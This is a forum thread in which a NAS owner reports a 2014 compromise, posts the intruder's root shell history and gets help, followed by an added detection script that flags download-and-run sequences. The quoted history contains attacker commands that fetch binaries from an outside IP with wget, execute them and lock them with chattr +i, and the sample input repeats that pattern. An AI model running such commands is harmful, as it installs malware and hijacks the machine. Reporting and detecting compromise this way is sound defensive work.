kooolkat (Tutor), Oct 28, 2014
ReadyNAS Ultra hacked
Hi,
I think my ReadyNAS Ultra is hacked to send DoS attacks. I found this under bash_history in the root directory.
c:
/c/
sickbeard
chmmod 777 sickbeard.log
"chmod 777 sickbeard.log"
passwd
ps -ef
killall -9 mt-daapd
killall -9 ifplugd
killall -9 proftpd
wget http://222.186.34.143:123/ssh26
chmod +x ssh26
./ssh26
chattr +i ssh26
ps -ef
killall -9 ssh26
killall -9 .sshd
killall -9 ssh2
wget http://222.186.34.143:123/26ssh33
chmod +x 26ssh33
./26ssh33
chattr +i 26ssh33
ps -ef
wget http://222.186.34.143:123/ssh33
chmod +x ssh33
./ssh33
chattr +i ssh33
It's not possible to delete the ssh33, ssh26 and 26ssh33 files in the root directory. There are also files called bashrc, profile, conf.n
Any help to get rid of the problem is much appreciated.
9 Replies
- mdgm-ntgr (NETGEAR Employee Retired): Yes your NAS is hacked. Sending you a PM.
- kooolkat (Tutor): Thank you, I've posted a PM reply
- ynohtna (Tutor): How did you get hacked? A service you use? Opening ports to it?
- kooolkat (Tutor): I think someone used the "ShellShock" vulnerability before I updated to RAIDiator-x86 4.2.27 or possibly open ports regarding sickbeard.
- super_poussin (Virtuoso): You are not alone http://www.reddit.com/r/linux/comments/ ... need_help/
- ynohtna (Tutor): Is the only way to know if you've been hacked via ssh and checking for files?
  Is there something pfSense can show in regards to bad types of traffic or whatever?
- kooolkat (Tutor): I found out when my router got overloaded with inbound traffic. I then used WinSCP for root access and discovered the files. I don't know regarding pfSense
- StephenB (Guru - Experienced User): We've also seen 1 or 2 recent cases posted here when the local LAN was overloaded with traffic.
  If the hack doesn't generate a lot of traffic or obvious misbehavior of the NAS functions it would be hard to spot.
- kooolkat (Tutor):
  mdgm wrote: Yes your NAS is hacked. Sending you a PM.
  NAS up and running as normal because of good help from mdgm. Thanks a lot :)
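
On the question raised in the thread of how to spot this kind of compromise: the following is an added example, not code from any poster or from NETGEAR, that scans a shell history file for the download, chmod, run, chattr sequence visible in the posted history. The function names, flag labels and sample input are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: flag download-and-run sequences in a shell history file.
# Heuristic only; the pattern is the one in the history posted above:
#   wget URL/NAME -> chmod +x NAME -> ./NAME -> chattr +i NAME

# scan_history FILE prints "NAME URL FLAGS" for each downloaded file.
scan_history() {
    awk '
    function base(p,    a, n) { n = split(p, a, "/"); return a[n] }
    function flag(name, f) {
        if (name in url && index(flags[name], f) == 0)
            flags[name] = flags[name] (flags[name] == "" ? "" : ",") f
    }
    $1 == "wget" || $1 == "curl" {
        for (i = 2; i <= NF; i++)
            if ($i ~ "^(https?|ftp)://.*/[^/]+$") {
                name = base($i)
                if (!(name in url)) order[++count] = name
                url[name] = $i
            }
        next
    }
    $1 == "chmod" && ($2 ~ /\+[a-z]*x/ || $2 ~ /^[0-7]*[1357][0-7]*$/) {
        flag(base($NF), "made_executable"); next
    }
    $1 == "chattr" && $2 ~ /^\+[A-Za-z]*i/ { flag(base($NF), "made_immutable"); next }
    $1 == "sh" || $1 == "bash" { flag(base($2), "executed"); next }
    NF { flag(base($1), "executed") }
    END {
        for (k = 1; k <= count; k++) {
            n = order[k]
            print n, url[n], (flags[n] == "" ? "-" : flags[n])
        }
    }' "$1"
}

# Constructed sample input (192.0.2.10 is a documentation address).
sample_history() {
    cat <<'EOF'
ps -ef
chmod 777 sickbeard.log
wget http://192.0.2.10:123/ssh26
chmod +x ssh26
./ssh26
chattr +i ssh26
wget http://192.0.2.10:123/notes.txt
EOF
}

if [ "$#" -gt 0 ]; then scan_history "$1"; fi
```

A file reported as made_immutable carries the `i` attribute set by `chattr +i`, which is why it cannot be deleted even by root until `chattr -i` is run on it; `lsattr` shows the attribute.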